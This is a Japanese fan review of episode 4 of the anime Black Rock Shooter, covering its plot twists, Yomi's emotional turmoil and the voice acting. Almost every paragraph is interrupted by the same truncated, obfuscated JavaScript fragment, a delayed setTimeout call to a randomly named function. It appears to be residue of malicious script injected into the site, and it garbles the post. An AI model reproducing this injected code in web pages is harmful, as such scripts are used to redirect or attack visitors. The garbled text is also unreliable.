【アニメ感想】ブラック★ロックシューター 第4話「いつか夢見た世界が閉じる」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレ注意!!

今回の展開は予想外でした。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
崖から捨てるシーンにどんな意味があるのかなと思っていましたが
これは、それに関する感情?記憶的なものも捨てるという感じかな?
前の話でBRSが倒したやつも、それによってそれに関する感情がなくなったのかもしれないです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
転校してきたのはいいけど、いきなりの毒舌。
普通はこれでクラスに馴染めなくて的な展開かとおもいきや
ドM集団なクラスメイトなのか。
この展開は予想外で面白かった。お前ら訓練されすぎ。

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
さやちゃん先生のコップ。
小鳥ですね。これは生徒ごとに用意されてるっぽい感じですね。
(あとのレンジとのシーンをみても、そんな感じです)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
変にこじれる展開なのかなと、このあたりは普通にみていました。
ヨミと仲良くしているシーンをみて、ヨミがショックをうけるとかそんな定番な展開を予想をしていた。
そんな定番ひっくり返されたけど。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ヨミを追い込む追撃メール。
これはもう、見ている人はみんな追い打ちになるのわかっていたでしょうね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
仲直りするけど、これでヨミが依存しちゃうのか。
とか、思っていましたよ・・・


このあとの、ヨミの

「えっ・・・」
というところで、マヂカ!!とびっくりしましたよ。
まさかの展開でした。
私も、えっ?とか、いいそうになった。

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
なんか表情が微妙なことが多いなと思っていたら、ヨミが好きだったこと、お世話されていたことがよくわからなくなっているとのこと。
先輩と同じ状態ってことですよね。
付きまとわれて迷惑に感じていたからあの表情だったのだろうか。

なんにせよ、まさかの展開でびっくりでした。
ひさしぶりに典型でびっくりさせされました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
「できた・・・」てなことらしいです。
先生・・・このマグカップが象徴なんですね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
これでダークマター完成でしょうか。

それにしても、声優の沢城さんが配役になっているのに納得してしまうしかない。
本当に今回の話はヨミの心情が痛烈にでていました。

好きな声優さんの迫真の演技。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
安心のぺったん。

コメントを残す